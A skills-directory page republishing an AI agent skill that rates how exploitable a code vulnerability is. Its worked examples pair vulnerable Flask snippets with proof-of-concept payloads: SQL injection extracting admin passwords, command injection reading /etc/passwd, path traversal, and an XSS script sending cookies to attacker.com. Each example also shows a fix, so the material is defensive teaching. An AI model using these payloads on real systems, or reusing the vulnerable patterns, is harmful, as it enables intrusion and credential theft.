Code Security Audit
ProgrammerAnthony/Expert-Coding-Harness
A skill your agent uses when 用户需要对代码进行安全审计、发现安全漏洞、上线前安全评估、检查代码是否存在安全风险时。触发场景:代码安全审计、安全审计、白盒审计、安全扫描、漏洞检测、漏洞挖掘、SQL注入、命令注入、XSS、SSRF、反序列化、认证绕过、越权、代码安全检查、security audit、code…
Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context.
$ npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install ArabelaTso/Skills-4-SE exploitability-analyzer --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/ArabelaTso/Skills-4-SE.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/exploitability-analyzer .claude/skills/exploitability-analyzer && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "exploitability-analyzer" agent skill from https://github.com/ArabelaTso/Skills-4-SE/tree/main/skills/exploitability-analyzer into .claude/skills/exploitability-analyzer/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploitability-analyzer", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/ArabelaTso/Skills-4-SE/tree/main/skills/exploitability-analyzerType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install ArabelaTso/Skills-4-SE exploitability-analyzer --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ArabelaTso/Skills-4-SE.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/exploitability-analyzer .agents/skills/exploitability-analyzer && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "exploitability-analyzer" agent skill from https://github.com/ArabelaTso/Skills-4-SE/tree/main/skills/exploitability-analyzer into .agents/skills/exploitability-analyzer/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploitability-analyzer", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install ArabelaTso/Skills-4-SE exploitability-analyzer --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ArabelaTso/Skills-4-SE.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/exploitability-analyzer .cursor/skills/exploitability-analyzer && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "exploitability-analyzer" agent skill from https://github.com/ArabelaTso/Skills-4-SE/tree/main/skills/exploitability-analyzer into .cursor/skills/exploitability-analyzer/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploitability-analyzer", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/ArabelaTso/Skills-4-SE.git --path skills/exploitability-analyzer--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install ArabelaTso/Skills-4-SE exploitability-analyzer --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ArabelaTso/Skills-4-SE.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/exploitability-analyzer .gemini/skills/exploitability-analyzer && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "exploitability-analyzer" agent skill from https://github.com/ArabelaTso/Skills-4-SE/tree/main/skills/exploitability-analyzer into .gemini/skills/exploitability-analyzer/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploitability-analyzer", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install ArabelaTso/Skills-4-SE exploitability-analyzerInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/ArabelaTso/Skills-4-SE.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/exploitability-analyzer .github/skills/exploitability-analyzer && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "exploitability-analyzer" agent skill from https://github.com/ArabelaTso/Skills-4-SE/tree/main/skills/exploitability-analyzer into .github/skills/exploitability-analyzer/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploitability-analyzer", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install ArabelaTso/Skills-4-SE exploitability-analyzer --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/ArabelaTso/Skills-4-SE.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/exploitability-analyzer .opencode/skills/exploitability-analyzer && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "exploitability-analyzer" agent skill from https://github.com/ArabelaTso/Skills-4-SE/tree/main/skills/exploitability-analyzer into .opencode/skills/exploitability-analyzer/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploitability-analyzer", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
exploitability-analyzerAnalyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context.
Exploitability Analyzer is an agent skill from ArabelaTso/Skills-4-SE. Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context. Use when users need to: (1) Determine if a vulnerability is actually exploitable in practice, (2) Assess severity and impact of security issues, (3) Prioritize vulnerability remediation, (4) Understand attack vectors and exploitation conditions, (5) Generate exploitability reports with proof-of-concept scenarios. Focuses on injection vulnerabilities (SQL…
Its SKILL.md is about 3.5k tokens, which your agent loads only when the skill is triggered. The skill folder holds 2 other files, including reference files (for example `references/assessment_criteria.md`).
It sits in Security, covering Web application vulnerabilities, Prototyping and Penetration testing. It works with SQL. The repository describes itself as: A curated list of 180+ useful Claude Skills for Software Engineering and resources for customizing AI for SE workflows. The licence is Apache-2.0.
7 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit 4f38503. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
No scripts in the folder and no shell commands in SKILL.md (its code samples are python).
From the folder's file list and the shell code blocks in SKILL.md.
No URLs in SKILL.md.
From URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Exploitability Analyzer loads about 3.5k tokens when it runs, and up to ~6.5k if it reads all its reference files. Until then it costs about 163 tokens; SKILL.md has 1,063 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from ArabelaTso/Skills-4-SE at commit 4f38503, republished under its Apache-2.0 licence (© ArabelaTso). 1,063 words, ~3,538 tokens.
.claude/skills/exploitability-analyzer/SKILL.md (or your agent's skills folder). This skill also uses 1 other file; get the full folder from GitHub.Assess whether detected vulnerabilities are realistically exploitable.
This skill analyzes security vulnerabilities to determine if they're actually exploitable in practice. It examines control flow to assess reachability, traces input sources to evaluate controllability, analyzes sanitization logic, and considers execution context to provide realistic exploitability assessments with severity ratings.
Provide:
The skill will analyze:
Classify the vulnerability:
Follow the data from source to sink:
Source: Where does the input originate?
Transformations: What happens to the input?
Sink: Where is the input used dangerously?
Question: Can an attacker reach the vulnerable code path?
Critical: Public endpoint, no authentication High: Authenticated endpoint, common user role Medium: Requires specific conditions or privileges Low: Admin-only, internal function, rare code path None: Dead code, unreachable
Question: Can an attacker control the vulnerable input?
High: Direct user input (GET/POST parameters, headers) Medium: Indirect control (database, config files) Low: Derived values, heavily processed None: Hardcoded, system-generated
Question: Is the input properly sanitized?
None: No sanitization, direct pass-through Weak: Blacklist filtering, incomplete escaping Partial: Some sanitization but bypassable Strong: Whitelist validation, proper escaping, parameterization
Question: What damage can an attacker cause?
Critical: Remote code execution, full system compromise High: Data breach, privilege escalation, DoS Medium: Limited data access, information disclosure Low: Minor information leak, cosmetic issues
Combine factors to determine overall exploitability:
| Reachability | Controllability | Sanitization | Impact | Exploitability |
|---|---|---|---|---|
| High | High | None | Critical | CRITICAL |
| High | High | Weak | High | HIGH |
| High | High | Partial | Medium | MEDIUM |
| Medium | Medium | Strong | Low | LOW |
| Any | Any | Strong | Any | NONE |
Vulnerable Code:
@app.route('/user')
def get_user():
username = request.args.get('username')
query = f"SELECT * FROM users WHERE username = '{username}'"
cursor.execute(query)
return cursor.fetchone()Analysis:
1. Vulnerability Type: SQL Injection
2. Data Flow:
request.args.get('username') - user-controlled query parametercursor.execute(query) - SQL execution3. Reachability: High
/user)4. Controllability: High
username value5. Sanitization: None
6. Impact: Critical
7. Exploitability: CRITICAL
Proof-of-Concept:
GET /user?username=' OR '1'='1' --This bypasses authentication and returns all users.
Advanced Exploit:
GET /user?username=' UNION SELECT password FROM admin_users --This extracts admin passwords.
Remediation:
@app.route('/user')
def get_user():
username = request.args.get('username')
# Use parameterized query
query = "SELECT * FROM users WHERE username = ?"
cursor.execute(query, (username,))
return cursor.fetchone()Vulnerable Code:
@app.route('/ping')
def ping_host():
host = request.form.get('host')
if ';' in host or '|' in host:
return "Invalid host"
result = os.system(f"ping -c 4 {host}")
return f"Ping result: {result}"Analysis:
1. Vulnerability Type: Command Injection
2. Data Flow:
request.form.get('host') - user-controlled POST parameter; and |os.system() - shell command execution3. Reachability: High
4. Controllability: High
host parameter5. Sanitization: Weak
; and |$(), backticks, &&, ||, newlines6. Impact: Critical
7. Exploitability: HIGH (not Critical due to weak sanitization that may deter casual attackers)
Proof-of-Concept:
POST /ping
host=$(whoami)This executes whoami command.
Advanced Exploit:
POST /ping
host=127.0.0.1 && cat /etc/passwdThis reads sensitive files.
Remediation:
import subprocess
import shlex
@app.route('/ping')
def ping_host():
host = request.form.get('host')
# Validate input with whitelist
if not re.match(r'^[a-zA-Z0-9.-]+$', host):
return "Invalid host"
# Use subprocess without shell
result = subprocess.run(['ping', '-c', '4', host],
capture_output=True, text=True)
return f"Ping result: {result.stdout}"Vulnerable Code:
@app.route('/search')
def search():
query = request.args.get('q', '')
results = db.search(query)
return render_template_string(f"""
<h1>Search Results for: {query}</h1>
<ul>
{% for result in results %}
<li>{{ result }}</li>
{% endfor %}
</ul>
""", results=results)Analysis:
1. Vulnerability Type: Cross-Site Scripting (XSS)
2. Data Flow:
request.args.get('q') - user-controlled query parameterrender_template_string() - HTML rendering with f-string3. Reachability: High
4. Controllability: High
5. Sanitization: None
6. Impact: High
7. Exploitability: MEDIUM (assuming modern browser protections)
Proof-of-Concept:
GET /search?q=<script>alert(document.cookie)</script>This executes JavaScript in victim's browser.
Advanced Exploit:
GET /search?q=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>This exfiltrates session cookies.
Remediation:
from markupsafe import escape
@app.route('/search')
def search():
query = request.args.get('q', '')
results = db.search(query)
# Use proper template with auto-escaping
return render_template('search.html',
query=escape(query),
results=results)Vulnerable Code:
@app.route('/download')
@login_required # Requires authentication
def download_file():
filename = request.args.get('file')
# Blacklist check
if '..' in filename:
return "Invalid filename"
filepath = os.path.join('/var/www/uploads', filename)
return send_file(filepath)Analysis:
1. Vulnerability Type: Path Traversal
2. Data Flow:
request.args.get('file') - user-controlled..send_file() - file system access3. Reachability: Medium
@login_required)4. Controllability: High
5. Sanitization: Weak
..6. Impact: Medium
7. Exploitability: LOW (authentication required + weak but present sanitization)
Proof-of-Concept:
GET /download?file=/etc/passwdThis may read sensitive files if absolute paths work.
Bypass Attempt:
GET /download?file=....//....//etc/passwdThis may bypass the .. check.
Remediation:
import os
@app.route('/download')
@login_required
def download_file():
filename = request.args.get('file')
# Whitelist validation
if not re.match(r'^[a-zA-Z0-9_.-]+$', filename):
return "Invalid filename"
# Resolve and validate path
base_dir = '/var/www/uploads'
filepath = os.path.realpath(os.path.join(base_dir, filename))
if not filepath.startswith(base_dir):
return "Access denied"
return send_file(filepath)For each vulnerability, provide:
VULNERABILITY: <Type> in <Location>
Location: <File:line or endpoint>
Vulnerability Type: <SQL Injection, XSS, etc.>
DATA FLOW:
Source: <Where input comes from>
Transformations: <What happens to input>
Sink: <Where input is used dangerously>
EXPLOITABILITY ASSESSMENT:
Reachability: <Critical/High/Medium/Low/None> - <Explanation>
Controllability: <High/Medium/Low/None> - <Explanation>
Sanitization: <None/Weak/Partial/Strong> - <Explanation>
Impact: <Critical/High/Medium/Low> - <Explanation>
OVERALL EXPLOITABILITY: <CRITICAL/HIGH/MEDIUM/LOW/NONE>
PROOF-OF-CONCEPT:
<Example exploit demonstrating the vulnerability>
IMPACT:
<Detailed description of potential damage>
REMEDIATION:
<Specific code fix or mitigation strategy>Detailed assessment criteria:
Load this reference when:
© ArabelaTso, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
SKILL.md and 1 other file (references) in skills/exploitability-analyzer of ArabelaTso/Skills-4-SE.
Open the folder on GitHubat commit 4f38503
Exploitability Analyzer next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Exploitability Analyzer this skillArabelaTso/Skills-4-SE | 253 | — | ~3.5k | Automated safety check: Pass | Apache-2.0 | |
| Code Security AuditProgrammerAnthony/Expert-Coding-Harness | 235 | — | ~1.6k | Automated safety check: Pass | MIT | |
| Web Sqlis0ld13rr/pentestcode | 827 | — | ~710 | Automated safety check: Pass | MIT | |
| Secknowledge SkillPa55w0rd/secknowledge-skill | 423 | — | ~2.7k | Automated safety check: Pass | None | |
| Php Codeigniter Audit0xShe/PHP-Code-Audit-Skill | 402 | 1 repos | ~477 | Automated safety check: Pass | None | |
| Security ReviewerAratKruglik/claude-laravel | 155 | 1 repos | ~1.1k | Automated safety check: Notes | None |
ProgrammerAnthony/Expert-Coding-Harness
A skill your agent uses when 用户需要对代码进行安全审计、发现安全漏洞、上线前安全评估、检查代码是否存在安全风险时。触发场景:代码安全审计、安全审计、白盒审计、安全扫描、漏洞检测、漏洞挖掘、SQL注入、命令注入、XSS、SSRF、反序列化、认证绕过、越权、代码安全检查、security audit、code…
s0ld13rr/pentestcode
SQL injection detection→exploitation→proof for web apps and APIs.
Pa55w0rd/secknowledge-skill
Web+AI 安全测试知识库。融合 WooYun 88,636 案例 + 先知 L1-L4 方法论 + GAARM 173 风险 + OWASP Top 10 (LLM/ASI/WSTG)。
0xShe/PHP-Code-Audit-Skill
CodeIgniter 框架特效安全审计工具。针对 CodeIgniter 的 CSRF、XSS 输出过滤、数据库查询构造、路由与验证器配置、会话 Cookie 安全等机制进行白盒静态审计,并映射到通用漏洞类型体系(CSRF/AUTH/XSS/SQL/CFG/SESS 等)。
AratKruglik/claude-laravel
A skill your agent uses when conducting security audits, reviewing code for vulnerabilities, or analyzing infrastructure security.
liuyanghejerry/Clausura
TypeScript monorepo 审查:XSS、SQL 注入、密钥、any、console.log. An agent skill from liuyanghejerry/Clausura.
ArabelaTso/Skills-4-SE
Generate prioritized CVE watchlists and actionable security recommendations for repositories.
ArabelaTso/Skills-4-SE
Automatically migrate Python web applications between frameworks (Flask → FastAPI, Django → FastAPI).
ArabelaTso/Skills-4-SE
Generate test cases using metamorphic testing by applying transformations based on metamorphic properties.
ArabelaTso/Skills-4-SE
Instruments programs to capture execution traces specifically for reproducing reported bugs, enabling consistent replay and diagnosis of failures.
ArabelaTso/Skills-4-SE
Automatically migrate Spring MVC applications to Spring Boot.
ArabelaTso/Skills-4-SE
Instrument programs (Python, C/C++, Java) to capture snapshots of key program states at runtime, including variables, memory, and call stacks.
Works with
Categories
Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context. Exploitability Analyzer is an agent skill from ArabelaTso/Skills-4-SE. Analyze detected vulnerabilities to assess realistic exploitability by examining control flow, input sources, sanitization logic, and execution context.
Exploitability Analyzer fits situations like: determine if a vulnerability is actually exploitable in practice; assess severity and impact of security issues; prioritize vulnerability remediation; understand attack vectors and exploitation conditions.
Run `npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a claude-code`. Or copy the skill folder (skills/exploitability-analyzer in ArabelaTso/Skills-4-SE) into .claude/skills/exploitability-analyzer in your project. Claude Code loads it when a task matches its description.
Run `npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a codex`. Or copy the skill folder (skills/exploitability-analyzer in ArabelaTso/Skills-4-SE) into .agents/skills/exploitability-analyzer in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add ArabelaTso/Skills-4-SE --skill exploitability-analyzer -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/exploitability-analyzer, .gemini/skills/exploitability-analyzer, .github/skills/exploitability-analyzer and .opencode/skills/exploitability-analyzer in your project.
SKILL.md names no scripts, command-line tools or credentials: Exploitability Analyzer is instructions for the agent only. Our summary lists: Python 3.
SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Exploitability Analyzer is published under the Apache-2.0 licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 3.5k tokens (SKILL.md is roughly 14k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 2.9k tokens, read only when the agent opens those files.
Skills that share tags, products or a category with Exploitability Analyzer: Code Security Audit (ProgrammerAnthony/Expert-Coding-Harness, 235 stars), Web Sqli (s0ld13rr/pentestcode, 827 stars), Secknowledge Skill (Pa55w0rd/secknowledge-skill, 423 stars) and Php Codeigniter Audit (0xShe/PHP-Code-Audit-Skill, 402 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
ArabelaTso (a GitHub user) maintains it in ArabelaTso/Skills-4-SE, which has 253 GitHub stars. The repository holds 150 skills in this directory. The repository was last updated on August 21, 2026.
Source: ArabelaTso/Skills-4-SE on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.